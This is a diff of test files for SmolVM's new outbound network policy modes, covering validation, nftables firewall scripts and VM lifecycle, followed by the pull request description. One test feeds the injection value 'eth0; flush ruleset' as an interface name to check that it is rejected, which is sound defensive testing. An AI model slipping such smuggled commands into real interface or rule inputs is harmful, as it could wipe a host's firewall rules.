         with pytest.raises(ValidationError, match="paths"):
@@ -68,7 +68,7 @@ class TestInternetSettings:
 
     def test_empty_entries_filtered(self) -> None:
         settings = InternetSettings(allowed_domains=["example.com", "  ", "test.com"])
-        assert settings.allowed_domains == ["example.com", "test.com"]
+        assert settings.allowed_domains == ("example.com", "test.com")
 
     def test_empty_list_raises(self) -> None:
         with pytest.raises(ValidationError, match="allowed_domains"):
@@ -94,7 +94,7 @@ class TestInternetSettings:
 
     def test_from_dict(self) -> None:
         settings = InternetSettings(**{"allowed_domains": ["https://example.com/"]})
-        assert settings.allowed_domains == ["example.com"]
+        assert settings.allowed_domains == ("example.com",)
 
 
 class TestResolveDomains:
@@ -179,7 +179,7 @@ def test_explicit_policy_round_trip(mode: str) -> None:
     assert InternetSettings.model_validate_json(settings.model_dump_json()) == settings
     assert settings.is_allow_all_domains is (mode == "open")
     if mode == "restricted":
-        assert settings.allowed_cidrs == ["198.51.100.0/24", "203.0.113.7/32"]
+        assert settings.allowed_cidrs == ("198.51.100.0/24", "203.0.113.7/32")
 
 
 @pytest.mark.parametrize(
@@ -203,7 +203,7 @@ def test_invalid_policy(settings: dict) -> None:
 
 def test_overlapping_ranges_are_collapsed() -> None:
     settings = InternetSettings(mode="restricted", allowed_cidrs=["10.20.0.0/24", "10.20.0.1"])
-    assert settings.allowed_cidrs == ["10.20.0.0/24"]
+    assert settings.allowed_cidrs == ("10.20.0.0/24",)
 
 
 @pytest.mark.parametrize("value", ["example.com", "::1", "10.0.0.1/99", ""])
@@ -219,12 +219,37 @@ def test_invalid_address_shows_usable_examples(value: str) -> None:
 def test_non_aligned_range_suggests_correction_without_widening_access() -> None:
     with pytest.raises(ValidationError, match="use '10.20.0.0/24'"):
         InternetSettings(mode="restricted", allowed_cidrs=["10.20.0.7/24"])
-    assert InternetSettings(mode="restricted", allowed_cidrs=["10.20.0.7"]).allowed_cidrs == [
-        "10.20.0.7/32"
-    ]
+    assert InternetSettings(mode="restricted", allowed_cidrs=["10.20.0.7"]).allowed_cidrs == (
+        "10.20.0.7/32",
+    )
 
 
 @pytest.mark.parametrize("unknown", [{"mod": "off"}, {"enabled": False}, {"allowed_ports": [443]}])
 def test_unknown_policy_fields_are_rejected(unknown: dict) -> None:
     with pytest.raises(ValidationError, match="Extra inputs are not permitted"):
         InternetSettings(**unknown)
+
+
+def test_policy_owns_immutable_collections_and_preserves_json_arrays(tmp_path):
+    import json
+
+    from smolvm.storage import MemoryStateManager
+    from smolvm.types import VMConfig
+
+    addresses = ["1.1.1.1"]
+    policy = InternetSettings(mode="restricted", allowed_cidrs=addresses)
+    disk = tmp_path / "disk"
+    disk.touch()
+    config = VMConfig(rootfs_path=disk, kernel_path=disk, internet_settings=policy)
+    inventory = MemoryStateManager(tmp_path)
+    info = inventory.create_vm(config)
+    addresses.append("2.2.2.2")
+    assert info.config.internet_settings.allowed_cidrs == ("1.1.1.1/32",)
+    for field in ("allowed_cidrs", "allowed_domains", "allowed_http_methods"):
+        with pytest.raises(AttributeError):
+            getattr(info.config.internet_settings, field).append("unexpected")
+    saved = json.loads(policy.model_dump_json())
+    assert saved["allowed_cidrs"] == ["1.1.1.1/32"]
+    assert InternetSettings.model_validate(saved) == policy
+    legacy = InternetSettings.model_validate_json('{"allowed_domains": ["example.com"]}')
+    assert legacy.allowed_domains == ("example.com",)

--- a/tests/runtime/test_network.py
+++ b/tests/runtime/test_network.py
@@ -786,3 +786,82 @@ class TestEgressAllowlist:
         async_script = async_nm._async_run_nft_script.call_args_list[0].args[0]
 
         assert sync_script == async_script
+
+
+class TestExplicitNetworkPolicy:
+    @patch("smolvm.host.network.run_command")
+    def test_nat_without_blanket_permission(self, run_command) -> None:
+        run_command.return_value = MagicMock(stdout="")
+        nm = NetworkManager()
+        nm._outbound_interface = "eth0"
+        nm.setup_nat("tap42", allow_outbound=False)
+        scripts = _collect_nft_scripts(run_command)
+        assert 'oifname "eth0" counter masquerade' in scripts
+        assert 'add element inet smolvm_filter allowed_taps { "tap42" }' not in scripts
+
+    @pytest.mark.asyncio
+    @patch("smolvm.host.network.async_run_command")
+    async def test_async_nat_without_blanket_permission(self, run_command) -> None:
+        run_command.return_value = MagicMock(stdout="")
+        nm = NetworkManager()
+        nm._outbound_interface = "eth0"
+        await nm.async_setup_nat("tap42", allow_outbound=False)
+        scripts = _collect_nft_scripts(run_command)
+        assert 'oifname "eth0" counter masquerade' in scripts
+        assert 'add element inet smolvm_filter allowed_taps { "tap42" }' not in scripts
+
+    @pytest.mark.parametrize("destinations", [None, [], ["203.0.113.7/32"]])
+    def test_replacement_is_one_atomic_transaction(self, destinations) -> None:
+        nm = NetworkManager()
+        nm._ensure_nftables_base = MagicMock()
+        nm._run_nft_script = MagicMock()
+        nm.apply_network_policy("tap42", destinations)
+        nm._run_nft_script.assert_called_once()
+        script = nm._run_nft_script.call_args.args[0]
+        assert "flush table inet smolvm_policy_tap42" in script
+        assert "hook forward priority -10" in script
+        assert "hook input priority -10" in script
+        assert "ct state" not in script
+        assert script.index('oifname "tap*" counter drop') < script.index("169.254.0.0/16")
+        if destinations is not None:
+            assert 'input iifname "tap42" counter drop' in script
+            assert "meta nfproto ipv6 counter drop" in script
+            assert 'delete element inet smolvm_filter allowed_taps { "tap42" }' in script
+        if destinations:
+            assert script.index("169.254.0.0/16") < script.index("203.0.113.7/32")
+            assert script.index("203.0.113.7/32") < script.index(
+                'forward iifname "tap42" counter drop'
+            )
+
+    def test_invalid_interface_cannot_change_another_table(self) -> None:
+        nm = NetworkManager()
+        nm._run_nft_script = MagicMock()
+        with pytest.raises(ValueError):
+            nm.apply_network_policy("eth0; flush ruleset", [])
+        nm._run_nft_script.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_async_policy_matches_sync(self) -> None:
+        nm = NetworkManager()
+        nm._ensure_nftables_base = MagicMock()
+        nm._async_ensure_nftables_base = AsyncMock()
+        nm._run_nft_script = MagicMock()
+        nm._async_run_nft_script = AsyncMock()
+        nm.apply_network_policy("tap42", [])
+        await nm.async_apply_network_policy("tap42", [])
+        assert nm._run_nft_script.call_args == nm._async_run_nft_script.call_args
+
+    def test_policy_failure_propagates(self) -> None:
+        nm = NetworkManager()
+        nm._ensure_nftables_base = MagicMock()
+        nm._run_nft_script = MagicMock(side_effect=RuntimeError("nft failed"))
+        with pytest.raises(RuntimeError, match="nft failed"):
+            nm.apply_network_policy("tap42", [])
+
+    def test_cleanup_only_deletes_owned_policy(self) -> None:
+        nm = NetworkManager()
+        nm._run_nft_script = MagicMock()
+        nm.remove_network_policy("tap42")
+        assert nm._run_nft_script.call_args.args[0] == (
+            "add table inet smolvm_policy_tap42\ndelete table inet smolvm_policy_tap42\n"
+        )

--- a/tests/storage/test_disk_reclaim.py
+++ b/tests/storage/test_disk_reclaim.py
@@ -43,6 +43,8 @@ def manager(tmp_path: Path) -> SmolVMManager:
     network.async_prepare_tap_device = AsyncMock()
     network.async_add_route = AsyncMock()
     network.async_setup_nat = AsyncMock()
+    network.async_apply_network_policy = AsyncMock()
+    network.async_remove_network_policy = AsyncMock()
     network.async_setup_ssh_port_forward = AsyncMock()
     network.async_cleanup_nat_rules = AsyncMock()
     network.async_cleanup_tap = AsyncMock()

--- a/tests/vm/test_facade.py
+++ b/tests/vm/test_facade.py
@@ -1267,7 +1267,7 @@ class TestVMLocalImageParam:
         """Egress allowlist on Windows guests is Phase 2 scope."""
         disk = tmp_path / "win11.qcow2"
         disk.touch()
-        with pytest.raises(ValueError, match=r"internet_settings.* not yet supported for Windows"):
+        with pytest.raises(SmolVMError, match="guest does not support network restrictions"):
             SmolVM(
                 os="windows",
                 image=str(disk),
@@ -3873,3 +3873,49 @@ class TestVMFileDownload:
 
         with pytest.raises(ValueError, match="cannot be empty"):
             vm.download_file("", tmp_path / "out.txt")
+
+
+@pytest.mark.parametrize(
+    "settings",
+    [
+        {"mod": "off"},
+        {"enabled": False},
+        {"allowed_ips": ["1.1.1.1"]},
+        {"mode": "restricted"},
+        {"mode": "restricted", "allowed_cidrs": ["1.1.1.1"], "allowed_ports": [443]},
+    ],
+)
+def test_policy_errors_precede_image_preparation(settings):
+    from smolvm import ValidationError
+
+    with (
+        patch("smolvm.facade._build_auto_config") as build,
+        patch("smolvm.facade._build_local_image_config") as local,
+        patch("smolvm.facade.SmolVMManager") as manager,
+    ):
+        for kwargs in ({}, {"image": "/tmp/not-needed.qcow2", "os": "alpine"}):
+            with pytest.raises(ValidationError) as error:
+                SmolVM(internet_settings=settings, **kwargs)
+            assert error.value.details["field"] == "internet_settings"
+            assert error.value.details["errors"]
+        build.assert_not_called()
+        local.assert_not_called()
+        manager.assert_not_called()
+
+
+def test_unsupported_policy_precedes_image_preparation():
+    from smolvm import ValidationError
+
+    with patch("smolvm.facade._build_auto_config") as build:
+        with pytest.raises(ValidationError, match="Linux Firecracker"):
+            SmolVM(backend="qemu", internet_settings={"mode": "off"})
+        build.assert_not_called()
+
+
+def test_from_image_policy_errors_precede_kernel_preparation():
+    from smolvm import ValidationError
+
+    with patch("smolvm.facade.ensure_base_kernel_for_backend") as kernel:
+        with pytest.raises(ValidationError):
+            SmolVM.from_image(MagicMock(), internet_settings={"mod": "off"})
+        kernel.assert_not_called()

--- a/tests/vm/test_vm.py
+++ b/tests/vm/test_vm.py
@@ -2060,8 +2060,13 @@ class TestExplicitPolicyLifecycle:
             update={"backend": backend, "internet_settings": InternetSettings(mode="off")}
         )
         smol_vm.state = MagicMock()
-        with pytest.raises(SmolVMError, match="network"):
+        with pytest.raises(SmolVMError, match="network") as error:
             smol_vm.create(config)
+        message = str(error.value)
+        assert "Linux" in message
+        assert "backend='firecracker'" in message
+        assert "comm_channel='vsock'" in message
+        assert "remove internet_settings" not in message
         smol_vm.state.create_vm.assert_not_called()
 
     def test_start_failure_does_not_execute_guest(self, smol_vm, sample_config, monkeypatch):

--- a/tests/vm/test_vm.py
+++ b/tests/vm/test_vm.py
@@ -2088,7 +2088,7 @@ class TestExplicitPolicyLifecycle:
         settings = InternetSettings().model_copy(update={"allowed_http_methods": ["GET"]})
         config = sample_config.model_copy(update={"internet_settings": settings})
         smol_vm.state = MagicMock()
-        with pytest.raises(ValueError, match="HTTP method restrictions"):
+        with pytest.raises(SmolVMError, match="HTTP method restrictions"):
             smol_vm.create(config)
         smol_vm.state.create_vm.assert_not_called()
 

--- a/tests/vm/test_vm.py
+++ b/tests/vm/test_vm.py
@@ -30,7 +30,14 @@ from smolvm.exceptions import (
     VMAlreadyExistsError,
     VMNotFoundError,
 )
-from smolvm.types import InternetSettings, VMConfig, VMInfo, VMState, WorkspaceMount
+from smolvm.types import (
+    InternetSettings,
+    PortForwardConfig,
+    VMConfig,
+    VMInfo,
+    VMState,
+    WorkspaceMount,
+)
 from smolvm.vm import (
     LIBKRUN_GATEWAY_IP,
     LIBKRUN_GUEST_IP,
@@ -79,6 +86,8 @@ def _attach_mock_network(manager: SmolVMManager) -> MagicMock:
     mock_network.async_configure_tap = AsyncMock()
     mock_network.async_add_route = AsyncMock()
     mock_network.async_setup_nat = AsyncMock()
+    mock_network.async_apply_network_policy = AsyncMock()
+    mock_network.async_remove_network_policy = AsyncMock()
     mock_network.async_apply_egress_allowlist = AsyncMock()
     mock_network.async_setup_ssh_port_forward = AsyncMock()
     manager.network = mock_network
@@ -1949,3 +1958,145 @@ class TestResolveBootArgs:
         authkey_at = script.find("ssh-authkey-inject-start")
         sshd_at = script.find("sshd-start")
         assert 0 <= authkey_at < sshd_at, "key install must precede sshd start"
+
+
+class TestExplicitPolicyLifecycle:
+    @pytest.mark.parametrize("incompatible", ["ssh", "mount", "forward"])
+    def test_incompatible_options_fail_before_allocating(
+        self, smol_vm, sample_config, monkeypatch, tmp_path, incompatible
+    ):
+        monkeypatch.setattr("smolvm.vm.sys.platform", "linux")
+        monkeypatch.setattr("smolvm.comm.select.platform.system", lambda: "Linux")
+        updates = {"internet_settings": InternetSettings(mode="off"), "comm_channel": "vsock"}
+        if incompatible == "ssh":
+            updates["comm_channel"] = "ssh"
+        elif incompatible == "mount":
+            updates["workspace_mounts"] = [WorkspaceMount(host_path=tmp_path, guest_path="/work")]
+        else:
+            updates["port_forwards"] = [PortForwardConfig(host_port=18080, guest_port=8080)]
+        smol_vm.state = MagicMock()
+        with pytest.raises(SmolVMError, match="vsock|[Ss]hared folders"):
+            smol_vm.create(sample_config.model_copy(update=updates))
+        smol_vm.state.create_vm.assert_not_called()
+        smol_vm.state.allocate_ip.assert_not_called()
+
+    def test_create_policy_failure_releases_resources(self, smol_vm, sample_config, monkeypatch):
+        monkeypatch.setattr("smolvm.vm.sys.platform", "linux")
+        monkeypatch.setattr("smolvm.comm.select.platform.system", lambda: "Linux")
+        network = _attach_mock_network(smol_vm)
+        network.apply_network_policy.side_effect = SmolVMError("policy install failed")
+        config = sample_config.model_copy(
+            update={"internet_settings": InternetSettings(mode="off"), "comm_channel": "vsock"}
+        )
+        with patch.object(smol_vm.state, "release_ip", wraps=smol_vm.state.release_ip) as release:
+            with pytest.raises(SmolVMError, match="policy install failed"):
+                smol_vm.create(config)
+            release.assert_called_once_with(config.vm_id)
+        with pytest.raises(VMNotFoundError):
+            smol_vm.get(config.vm_id)
+        tap = network.prepare_tap_device.call_args.args[0]
+        network.cleanup_tap.assert_called_once_with(tap)
+        network.remove_network_policy.assert_called_once_with(tap)
+        network.setup_nat.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_async_start_policy_failure_prevents_execution(
+        self, smol_vm, sample_config, monkeypatch
+    ):
+        monkeypatch.setattr("smolvm.vm.sys.platform", "linux")
+        monkeypatch.setattr("smolvm.comm.select.platform.system", lambda: "Linux")
+        network = _attach_mock_network(smol_vm)
+        config = sample_config.model_copy(
+            update={"internet_settings": InternetSettings(mode="off"), "comm_channel": "vsock"}
+        )
+        info = smol_vm.create(config)
+        network.apply_network_policy.side_effect = SmolVMError("policy install failed")
+        adapter = MagicMock()
+        adapter.async_start = AsyncMock()
+        monkeypatch.setattr(smol_vm, "_runtime_adapter_for_backend", lambda _: adapter)
+        with pytest.raises(SmolVMError, match="policy install failed"):
+            await smol_vm.async_start(info.vm_id)
+        adapter.async_start.assert_not_awaited()
+        adapter.start.assert_not_called()
+
+    def test_resume_policy_failure_prevents_execution(self, smol_vm, sample_config, monkeypatch):
+        monkeypatch.setattr("smolvm.vm.sys.platform", "linux")
+        monkeypatch.setattr("smolvm.comm.select.platform.system", lambda: "Linux")
+        network = _attach_mock_network(smol_vm)
+        config = sample_config.model_copy(
+            update={"internet_settings": InternetSettings(mode="off"), "comm_channel": "vsock"}
+        )
+        info = smol_vm.create(config)
+        smol_vm.state.update_vm(info.vm_id, status=VMState.PAUSED)
+        network.apply_network_policy.side_effect = SmolVMError("policy install failed")
+        adapter = MagicMock()
+        monkeypatch.setattr(smol_vm, "_runtime_adapter_for_vm", lambda _: adapter)
+        with pytest.raises(SmolVMError, match="policy install failed"):
+            smol_vm.resume(info.vm_id)
+        adapter.resume.assert_not_called()
+
+    @pytest.mark.parametrize("mode", ["off", "restricted"])
+    def test_create_and_repair_do_not_open_network(self, smol_vm, sample_config, monkeypatch, mode):
+        monkeypatch.setattr("smolvm.vm.sys.platform", "linux")
+        monkeypatch.setattr("smolvm.comm.select.platform.system", lambda: "Linux")
+        network = _attach_mock_network(smol_vm)
+        settings = InternetSettings(
+            mode=mode, allowed_cidrs=["203.0.113.7"] if mode == "restricted" else []
+        )
+        config = sample_config.model_copy(
+            update={"internet_settings": settings, "comm_channel": "vsock"}
+        )
+        with patch("smolvm.vm.resolve_domains_to_ips", side_effect=AssertionError("DNS called")):
+            info = smol_vm.create(config)
+            smol_vm.ensure_network_connectivity(info)
+        for invocation in network.setup_nat.call_args_list:
+            assert invocation.kwargs == {"allow_outbound": False}
+        assert network.apply_network_policy.call_args.args[1] == settings.allowed_cidrs
+        network.setup_ssh_port_forward.assert_not_called()
+
+    @pytest.mark.parametrize("backend", ["qemu", "libkrun"])
+    def test_unsupported_policy_fails_before_allocating(self, smol_vm, sample_config, backend):
+        config = sample_config.model_copy(
+            update={"backend": backend, "internet_settings": InternetSettings(mode="off")}
+        )
+        smol_vm.state = MagicMock()
+        with pytest.raises(SmolVMError, match="network"):
+            smol_vm.create(config)
+        smol_vm.state.create_vm.assert_not_called()
+
+    def test_start_failure_does_not_execute_guest(self, smol_vm, sample_config, monkeypatch):
+        monkeypatch.setattr("smolvm.vm.sys.platform", "linux")
+        monkeypatch.setattr("smolvm.comm.select.platform.system", lambda: "Linux")
+        config = sample_config.model_copy(
+            update={"internet_settings": InternetSettings(mode="off"), "comm_channel": "vsock"}
+        )
+        network = _attach_mock_network(smol_vm)
+        info = smol_vm.create(config)
+        network.apply_network_policy.side_effect = RuntimeError("nft failed")
+        adapter = MagicMock()
+        smol_vm._runtime_adapter_for_backend = MagicMock(return_value=adapter)
+        with pytest.raises(RuntimeError, match="nft failed"):
+            smol_vm.start(info.vm_id)
+        adapter.start.assert_not_called()
+
+    def test_merged_invalid_settings_are_revalidated(self, smol_vm, sample_config):
+        settings = InternetSettings().model_copy(update={"allowed_http_methods": ["GET"]})
+        config = sample_config.model_copy(update={"internet_settings": settings})
+        smol_vm.state = MagicMock()
+        with pytest.raises(ValueError, match="HTTP method restrictions"):
+            smol_vm.create(config)
+        smol_vm.state.create_vm.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_async_create_applies_policy(self, smol_vm, sample_config, monkeypatch):
+        monkeypatch.setattr("smolvm.vm.sys.platform", "linux")
+        monkeypatch.setattr("smolvm.comm.select.platform.system", lambda: "Linux")
+        config = sample_config.model_copy(
+            update={"internet_settings": InternetSettings(mode="off"), "comm_channel": "vsock"}
+        )
+        network = _attach_mock_network(smol_vm)
+        info = await smol_vm.async_create(config)
+        network.async_apply_network_policy.assert_awaited_once_with(info.network.tap_device, [])
+        network.async_setup_nat.assert_awaited_once_with(
+            info.network.tap_device, allow_outbound=False
+        )

--- a/tests/vm/test_vm.py
+++ b/tests/vm/test_vm.py
@@ -2051,7 +2051,7 @@ class TestExplicitPolicyLifecycle:
             smol_vm.ensure_network_connectivity(info)
         for invocation in network.setup_nat.call_args_list:
             assert invocation.kwargs == {"allow_outbound": False}
-        assert network.apply_network_policy.call_args.args[1] == settings.allowed_cidrs
+        assert network.apply_network_policy.call_args.args[1] == list(settings.allowed_cidrs)
         network.setup_ssh_port_forward.assert_not_called()
 
     @pytest.mark.parametrize("backend", ["qemu", "libkrun"])


### PR DESCRIPTION
## Summary

Make outbound network settings predictable: add open, off, and IPv4 restricted modes to InternetSettings. Explicit restrictions require Linux Firecracker private networking with vsock; incompatible configurations fail before resource allocation.

Install per-interface firewall policies atomically before guest execution, preserve restrictions through start/repair/restore, and remove owned rules during cleanup. Keep commands and file transfers available through the direct control connection. Open remains the default. Legacy domain lists retain setup-time IP resolution semantics.

## Validation

- Full regression suite: 2,183 passed, 21 skipped, 33 deselected.
- Ruff lint and formatting passed.
- Firecracker and QEMU E2E jobs both pass on c729c57: https://github.com/CelestoAI/SmolVM/actions/runs/34314767896. The packet fixture handles runner forwarding defaults and waits for both IPv4/IPv6 responders.
- Built the Python wheel.
- Controlled Linux packet test passed against source and installed wheel, covering TCP/UDP, IPv6, isolation, failed replacement, stale connection state, and interface reuse.
- Added lifecycle failure-path tests and a startup/restore benchmark script.
- Real KVM Firecracker CI passed for off/restricted modes, including commands, file transfers, restart, and disk snapshot restore: https://github.com/CelestoAI/SmolVM/actions/runs/34314767896/job/102348569641.
- Packet fixture also passed locally with IPv4/IPv6 FORWARD policies set to DROP; temporary lab permissions are cleaned up.

## Pending release gates

- Baseline-versus-candidate startup and restore latency measurements, including destination-count and concurrency cases.

Do not release until these gates have evidence. No package or image release is included.

## Developer API fixes

- Unknown policy keys fail instead of silently allowing default access.
- Policy parsing and available compatibility checks happen before image preparation, with the same checks repeated before guest execution.
- Public SDK policy errors use smolvm.ValidationError with structured field errors; direct Pydantic construction retains its documented exception type.
- Policy collections are immutable tuples. List input and saved JSON arrays remain compatible.
- The Firecracker lifecycle test shares inventory across creation and restore, and checks file transfers after restart and restore.
- Added complete Python restore/inventory and error-handling examples; recovery messages no longer recommend deleting existing work.

The installed rebuilt wheel passed early-validation checks and the controlled Linux packet contract test. Real Firecracker lifecycle checks now pass in CI. Latency measurements remain pending as listed above.

## Summary by CodeRabbit

* **New Features**
  * Added network access modes: open, disabled, and restricted.
  * Restricted mode allows outbound access only to specified IPv4 CIDR ranges.
  * Network policies are enforced across VM creation, restart, restore, and snapshot workflows.
  * Invalid or incompatible network configurations now provide validation errors before execution.

* **Bug Fixes**
  * Prevented guest execution when network policy setup fails during restoration or startup.

* **Documentation**
  * Updated networking documentation with Firecracker/vsock requirements, CIDR behavior, domain compatibility, and limitations involving shared folders and exposed ports.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Added network access modes for disabling outbound access, allowing specific IPv4 ranges, or permitting open access.
  * Added network-policy enforcement for supported Linux Firecracker environments.
  * Added validation and clearer errors for unsupported combinations, including mounts, port forwarding, SSH, and unsupported platforms.
  * Added snapshot support and guidance for preserving network policies during restore.

* **Documentation**
  * Expanded networking documentation with policy modes, limitations, validation, and Firecracker requirements.
  * Added a network-policy implementation plan and benchmarking guidance.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->